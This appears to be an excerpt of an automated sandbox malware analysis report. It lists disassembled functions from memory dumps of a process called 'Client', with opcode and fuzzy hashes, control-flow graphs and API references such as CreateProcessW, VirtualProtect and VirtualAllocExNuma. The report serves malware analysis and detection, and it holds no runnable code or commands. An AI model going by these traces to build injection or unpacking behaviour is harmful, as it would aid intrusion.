                                                    • Instruction ID: afb8f736fa7f3b31f5b641dc374974ac16f21a47833f9b890ccc37f8a469dbbb
                                                    • Opcode Fuzzy Hash: 07d355589c84a3d8716419c67fbd7b30804c6ddaec4c4eaaec392c52054ac41f
                                                    • Instruction Fuzzy Hash: BCA2F8B4E012298FCB64DF29EEA469CBBF6BB88345F4051A9D509E7754EB705E80CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001F4AB9 Relevance: .3, Instructions: 270COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 53b3b15abf260b285cb0f6e80fb910dca45c38d457e11d4aa9e5c7376c8da57d
                                                    • Instruction ID: 3799c4c973f180f01f3861f49b29a8f617dfd0eb6ecb368b4367836a190dfe85
                                                    • Opcode Fuzzy Hash: 53b3b15abf260b285cb0f6e80fb910dca45c38d457e11d4aa9e5c7376c8da57d
                                                    • Instruction Fuzzy Hash: D3C12E35A00619DFCB15CFA4D8849EEFBB2FF48304B16C659E905AB321D771E982CB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C40548 Relevance: .3, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955712722.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4c40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a0835c8b785b211ddc2dbc4aef247040f054f5866da3eb62dfa4f81d5e30ab85
                                                    • Instruction ID: ea4d2237b3727709aee2bf2b35d659fc76b3f1a99c9326cf9e36a522a3ea9e8a
                                                    • Opcode Fuzzy Hash: a0835c8b785b211ddc2dbc4aef247040f054f5866da3eb62dfa4f81d5e30ab85
                                                    • Instruction Fuzzy Hash: 0AC11874E05218DFCB58DF75D9A869CBBB6BB88304F1054A9D50AEB364EB306E81CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C4050C Relevance: .3, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955712722.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4c40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6529d53d08b252106b1a5d16ce9c56a9850747ee3002e5b1313794fbea99122e
                                                    • Instruction ID: be452fb3bfd91de3b87d12dc0f3b3b84ba6b76337d024ee0474aec1df710a6f5
                                                    • Opcode Fuzzy Hash: 6529d53d08b252106b1a5d16ce9c56a9850747ee3002e5b1313794fbea99122e
                                                    • Instruction Fuzzy Hash: D9C10774E05218DFCB58DF65D9A869CBBB6BB88304F1054A9D50AEB364EB306E81CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001F4AC8 Relevance: .2, Instructions: 228COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f18831a9e7c044d298647514165666e1361ac11edfaaf34c22e58213939d785b
                                                    • Instruction ID: 5c880cd653afa0d29c9eb6bd8affad9d38e86118768e38f3f7e13803442c9758
                                                    • Opcode Fuzzy Hash: f18831a9e7c044d298647514165666e1361ac11edfaaf34c22e58213939d785b
                                                    • Instruction Fuzzy Hash: ACA11035E10619DFCB15CFA4D8849AEFBB2FF49304B26C655E905AB321D771E882CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00E9E940 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1302 e9e940-e9e9d5 1304 e9e9e0-e9e9e7 1302->1304 1305 e9e9d7-e9e9dd 1302->1305 1306 e9e9e9-e9e9ef 1304->1306 1307 e9e9f2-e9ea68 1304->1307 1305->1304 1306->1307 1310 e9ea6a-e9ea74 1307->1310 1311 e9eaa1-e9eb69 CreateProcessW 1307->1311 1310->1311 1312 e9ea76-e9ea78 1310->1312 1321 e9eb6b-e9eb71 1311->1321 1322 e9eb72-e9ec4d 1311->1322 1314 e9ea9b-e9ea9e 1312->1314 1315 e9ea7a-e9ea84 1312->1315 1314->1311 1316 e9ea88-e9ea97 1315->1316 1317 e9ea86 1315->1317 1316->1316 1318 e9ea99 1316->1318 1317->1316 1318->1314 1321->1322 1333 e9ec5c-e9ec60 1322->1333 1334 e9ec4f-e9ec52 1322->1334 1335 e9ec6f-e9ec73 1333->1335 1336 e9ec62-e9ec65 1333->1336 1334->1333 1337 e9ec83-e9ec87 1335->1337 1338 e9ec75-e9ec79 1335->1338 1336->1335 1340 e9ec99-e9ec9d 1337->1340 1341 e9ec89-e9ec8f 1337->1341 1338->1337 1339 e9ec7b 1338->1339 1339->1337 1342 e9ec9f-e9ecab 1340->1342 1343 e9ecae 1340->1343 1341->1340 1342->1343
                                                    APIs
                                                    • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00E9EB56
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947112008.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_e90000_Client.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: d412d15c8ee9122ffcb9dc458963d37b45369b14316d36958774863436a443c3
                                                    • Instruction ID: 1f9d9c1c7edd8bf91b03507b29fd62e83ef2df50d1197ec97ffcc056b743875e
                                                    • Opcode Fuzzy Hash: d412d15c8ee9122ffcb9dc458963d37b45369b14316d36958774863436a443c3
                                                    • Instruction Fuzzy Hash: FBA14871D006198BDF20CFA8C8416DDBBB2BF48308F258569D949BB240DB756E89CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001F29E8 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1371 1f29e8-1f2a71 VirtualProtect 1374 1f2a7a-1f2aaa 1371->1374 1375 1f2a73-1f2a79 1371->1375 1375->1374
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 001F2A64
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 63b4a7d73eef84c9d31adbd941e73e3b89855f32a01d901affe7a83df5762f64
                                                    • Instruction ID: 1c0e63c005479d55f5964bd9b3e30100cfb62ad437295b6f9a86aaecf691d13f
                                                    • Opcode Fuzzy Hash: 63b4a7d73eef84c9d31adbd941e73e3b89855f32a01d901affe7a83df5762f64
                                                    • Instruction Fuzzy Hash: 412139719006099FDB10CFAAC844BEEBBB1AF88314F51842ED519A7240DB799A44CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001F29F0 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1395 1f29f0-1f2a71 VirtualProtect 1398 1f2a7a-1f2aaa 1395->1398 1399 1f2a73-1f2a79 1395->1399 1399->1398
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 001F2A64
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: da2f145c3e41f2fc7d19d42e7bdea11e4fcc49be4df15d52118907b91d128fe7
                                                    • Instruction ID: c8befd4f03dc2bf5194b27c99c75bac16f6c11d9db7848c77ffe3d6d5ce098b9
                                                    • Opcode Fuzzy Hash: da2f145c3e41f2fc7d19d42e7bdea11e4fcc49be4df15d52118907b91d128fe7
                                                    • Instruction Fuzzy Hash: 532115719006099FDB10CFAAC8447EEFBF4AF88314F51882ED519A7240DB78AA44CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00343608 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocExNuma.KERNELBASE(?,00000000,?,?,?,?), ref: 00343679
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945814327.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_340000_Client.jbxd
                                                    Similarity
                                                    • API ID: AllocNumaVirtual
                                                    • String ID:
                                                    • API String ID: 4233825816-0
                                                    • Opcode ID: 47eecc3530ee31e14013908c617152bcce5dfd9976c88c29b39c0c0f716d2781
                                                    • Instruction ID: 224dd45569c0206d13915806ecd562a0db053e4b10972fe5bab633396a71c742
                                                    • Opcode Fuzzy Hash: 47eecc3530ee31e14013908c617152bcce5dfd9976c88c29b39c0c0f716d2781
                                                    • Instruction Fuzzy Hash: 191129719006099FDB10CFA9D8447EFBBF5EF49314F21881DE515B7250CB79A954CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B526BF Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: dYe_
                                                    • API String ID: 0-355695088
                                                    • Opcode ID: 1752762c9be0a9fc4e37a1ba9880f63b625a9b525c9c9ae02252cd0bb3aabc79
                                                    • Instruction ID: 4ef84e544ab2d58cc7eda61daf720adb614011863b353d3b71f5bd822c3f9182
                                                    • Opcode Fuzzy Hash: 1752762c9be0a9fc4e37a1ba9880f63b625a9b525c9c9ae02252cd0bb3aabc79
                                                    • Instruction Fuzzy Hash: 3E512A74F053198FDB68DF64C990A9DB7F1BB89214F5144E9C50AEB741EB30AE808F92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B59298 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: G8Mq
                                                    • API String ID: 0-1865055058
                                                    • Opcode ID: e77ecd634271d87c094b74d4891da2744727870e3c7fb58d2c137bb54b021fd2
                                                    • Instruction ID: 5c8edd28c055883cbba78cd3285dba722d43e6bbc49e4c77bd8172e66157a12c
                                                    • Opcode Fuzzy Hash: e77ecd634271d87c094b74d4891da2744727870e3c7fb58d2c137bb54b021fd2
                                                    • Instruction Fuzzy Hash: 26312131E04105CFCB18DBB4D6A06A9BBF2A785254B5604AECA06FF784EF309C00C7D1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001F26E1 Relevance: 1.3, APIs: 1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: de81b53c1cea7d089e9c4d35cfcf749f79e0105e21f3470b6156abd4eed3da04
                                                    • Instruction ID: c3e541f1f7b1c306951c1b4eec7e5325e3c1950477b78ed96cf3cee4771ef32c
                                                    • Opcode Fuzzy Hash: de81b53c1cea7d089e9c4d35cfcf749f79e0105e21f3470b6156abd4eed3da04
                                                    • Instruction Fuzzy Hash: 4C11AC718042088FCB10CFA9C8447EEFFF0AF89314F21881ED115B7240CB78AA44CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001F26E8 Relevance: 1.3, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 783501297dfa8010c51e17922918d5b419e375227023c82602f2e547b7c48848
                                                    • Instruction ID: 99e4a03143645a0115e1ee27942b9d387e0518e6f6b5ba8c2f48030f9f10fdec
                                                    • Opcode Fuzzy Hash: 783501297dfa8010c51e17922918d5b419e375227023c82602f2e547b7c48848
                                                    • Instruction Fuzzy Hash: BB115B719006098FDB10DFA9C4457EEFBF4AF88314F21881ED515B7240DB78A944CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E40794 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HdE"
                                                    • API String ID: 0-1750349462
                                                    • Opcode ID: 913d218a50aee2210a2f58689a498192c1f225d0aa20290969261301e15e168a
                                                    • Instruction ID: 265b0f2de28f58ea6abc13a9229992e275d50e129b17684092c22233abacf203
                                                    • Opcode Fuzzy Hash: 913d218a50aee2210a2f58689a498192c1f225d0aa20290969261301e15e168a
                                                    • Instruction Fuzzy Hash: 7E11E274D04229CFCB69DF20D8989DCBBB5BB98300F1184AAD509AB350DB306E81CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E408C1 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: sh{
                                                    • API String ID: 0-1564159750
                                                    • Opcode ID: 7a92d7c4444227f0173c43fa70690fbe7a06ac02100451bf046155832275af15
                                                    • Instruction ID: 2d2c2f10ffbed95e822d2211deb927fac33795d68c7517628a6733d7aed3a48c
                                                    • Opcode Fuzzy Hash: 7a92d7c4444227f0173c43fa70690fbe7a06ac02100451bf046155832275af15
                                                    • Instruction Fuzzy Hash: 5F11B674900218CFCB19DF60DC988DCBBB5FB98301F6145AADA09A7394DB305E82CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E40048 Relevance: .3, Instructions: 345COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c93ba01742998ecbf52c6699222d54d506de23da75f2b795f6a6ff29fa87e72
                                                    • Instruction ID: cce04b4784bc82b32ff6d122f5edbc13ffaa94e7889a62568d954ed42e99c941
                                                    • Opcode Fuzzy Hash: 1c93ba01742998ecbf52c6699222d54d506de23da75f2b795f6a6ff29fa87e72
                                                    • Instruction Fuzzy Hash: 37E19475F003158FC748DF78E9A4699BBB5BB98304F1061B9850AAB798EB306E45CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E4089C Relevance: .3, Instructions: 313COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 474e289fe58af8609a73702fefdb86414a12a8f8187af094dee15db544e5fb24
                                                    • Instruction ID: 54b1d1354796c96f665697ee60775ccfc9eb04c6583fc13241f5558bcefaf05c
                                                    • Opcode Fuzzy Hash: 474e289fe58af8609a73702fefdb86414a12a8f8187af094dee15db544e5fb24
                                                    • Instruction Fuzzy Hash: DDD16C75F003148FC758EF78EEA86987BF5FB58645F1061A88909A7799EB306E84CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E412A8 Relevance: .1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9961f6769408eb229a5f523a9f047ae46c66a7f649aafe097a905e6288677454
                                                    • Instruction ID: 073be4ce42264ca2349a689cb672fe90453cce54df820e720381b87b107088fd
                                                    • Opcode Fuzzy Hash: 9961f6769408eb229a5f523a9f047ae46c66a7f649aafe097a905e6288677454
                                                    • Instruction Fuzzy Hash: 8431FB74D0121AEFCB58DFA0EC896EDBBB5FB88305F4155A5D40AAB624DB306E81CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E41634 Relevance: .1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cee1552ca8c0ad424d35c820e35a07bf0571bfa3671a2bbfcea41754bfe6d5a7
                                                    • Instruction ID: 1443a5d39394c863712af0b90856657ebe569cea222d9da7e16524b8d745ca30
                                                    • Opcode Fuzzy Hash: cee1552ca8c0ad424d35c820e35a07bf0571bfa3671a2bbfcea41754bfe6d5a7
                                                    • Instruction Fuzzy Hash: 5521D479B502058FDB0CCF29C9A55A9B6F6ABC9204B14E16D9506EB388EB30D9468B00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C644E7 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955803392.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4c60000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e4949f05bbd33ad656e841cbeffd9ab178dc3eaa6a41205df474437ed924ba4a
                                                    • Instruction ID: 732c3673f7f7f1f82de280975200b92e0c3ef2331d25c37e97366abfe5091c75
                                                    • Opcode Fuzzy Hash: e4949f05bbd33ad656e841cbeffd9ab178dc3eaa6a41205df474437ed924ba4a
                                                    • Instruction Fuzzy Hash: AA31C5718081A9DFCF90AF68C89AA94B731FF66304F1444FBC91929146C7739E90EFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C644C6 Relevance: .1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955803392.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4c60000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2b5f3ef73fd07c78b4778ad72a777ef8a8875a68ca954735d3671ee85c6da3f2
                                                    • Instruction ID: 9ad4dec71e12c27b3c5e0afb110dedd0d6992e53e6528b2f42b7a177f2288b33
                                                    • Opcode Fuzzy Hash: 2b5f3ef73fd07c78b4778ad72a777ef8a8875a68ca954735d3671ee85c6da3f2
                                                    • Instruction Fuzzy Hash: 7C217C718081A89FCF51AF64CC88A98B771FF50304F0844FBC9092A156D3739EA0EFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B5EAF0 Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 77c3bf02da8ddbdb1c4eb76989b046941dd69813cc799f610fb4fd77b4dcf45d
                                                    • Instruction ID: 6c81f6c0afa8cc66bf86f8e1e3e71393ad78e781011614496b3ccfdfeef4afe8
                                                    • Opcode Fuzzy Hash: 77c3bf02da8ddbdb1c4eb76989b046941dd69813cc799f610fb4fd77b4dcf45d
                                                    • Instruction Fuzzy Hash: 4601F1317081049BD308DB69ED8495ABBEBABC535576480BAD50ACB76CDB30EC018750
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00D05B40 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947067483.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_d00000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f6e1c807a4b70a77d68159123c958162ebbe1979ad76a597369980ebb4b778c2
                                                    • Instruction ID: a00a3e468e53024f18be0bd7de074a876f5f66b71b52ca1f725ca82bd5aacd32
                                                    • Opcode Fuzzy Hash: f6e1c807a4b70a77d68159123c958162ebbe1979ad76a597369980ebb4b778c2
                                                    • Instruction Fuzzy Hash: DF01D4757046048FD308DF69EC90A577BA7EBD5324315843AE50B9B79CDA31EC11CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00D0AD60 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947067483.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_d00000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9e02252af5685ab1c0ef506ac084ae47d02e3c279e44dabac5ceba2fe197f4ee
                                                    • Instruction ID: 2c03379998c7e75e7f15b8773f033c4724d5d5ea517659e23793f66baa4b0f12
                                                    • Opcode Fuzzy Hash: 9e02252af5685ab1c0ef506ac084ae47d02e3c279e44dabac5ceba2fe197f4ee
                                                    • Instruction Fuzzy Hash: EE01D4353096049FD308DB19EC9486A7FA7EBD5364315D136D10ADB7A8EA31EC0287A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C60115 Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955803392.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4c60000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fe661d62775114b5c057260c3d5681539ab2c24b16ae403ce6b042814c0ed7d2
                                                    • Instruction ID: b263caa3553d95b0deb993483f112ba95f0547208502fe97ca22f024c702023f
                                                    • Opcode Fuzzy Hash: fe661d62775114b5c057260c3d5681539ab2c24b16ae403ce6b042814c0ed7d2
                                                    • Instruction Fuzzy Hash: E211EA74E14614CFCB55DF74D89969CBBF1EF88301F1184A9D40AAB254EB305D82CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00D0A720 Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947067483.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_d00000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fec317878a8801e03fc9aacac30afcb641c043e13370cb249411d647aafccd83
                                                    • Instruction ID: 06adead6f6896fed6cd667b49d5ad052aa1251c3b8ad4129aea7b436757b022c
                                                    • Opcode Fuzzy Hash: fec317878a8801e03fc9aacac30afcb641c043e13370cb249411d647aafccd83
                                                    • Instruction Fuzzy Hash: 980184357081584F9348DA6AED909577BE7A7C5254315C136D20ECF799DA30DC028751
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C6CC60 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955803392.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4c60000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 19c61dc5fff18fb351884334dbfc5a195a25d9161d1a29c938a610bb3438ccb4
                                                    • Instruction ID: 634ad4884cc7624a1a72068c754244553f89631295177288ce0dbf30c3195701
                                                    • Opcode Fuzzy Hash: 19c61dc5fff18fb351884334dbfc5a195a25d9161d1a29c938a610bb3438ccb4
                                                    • Instruction Fuzzy Hash: FC0144367040149BE308DA3AE9808527B97EBC2214368D277E506DF7A8EF31EC0387A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C6BFD0 Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955803392.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4c60000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8d51133d517a3a8750b0c99872241b1fe2cfcaca942d8905e2ce3f65c0e8a568
                                                    • Instruction ID: 6b293d8cd656c83bc34a325ee125b93dd35a96680541575061eb9f87406a48d2
                                                    • Opcode Fuzzy Hash: 8d51133d517a3a8750b0c99872241b1fe2cfcaca942d8905e2ce3f65c0e8a568
                                                    • Instruction Fuzzy Hash: 28F04C3A7050685B8308DA1AED9097ABFDFA7CA210348C177E64DCF749DA75ED05C760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E412DF Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
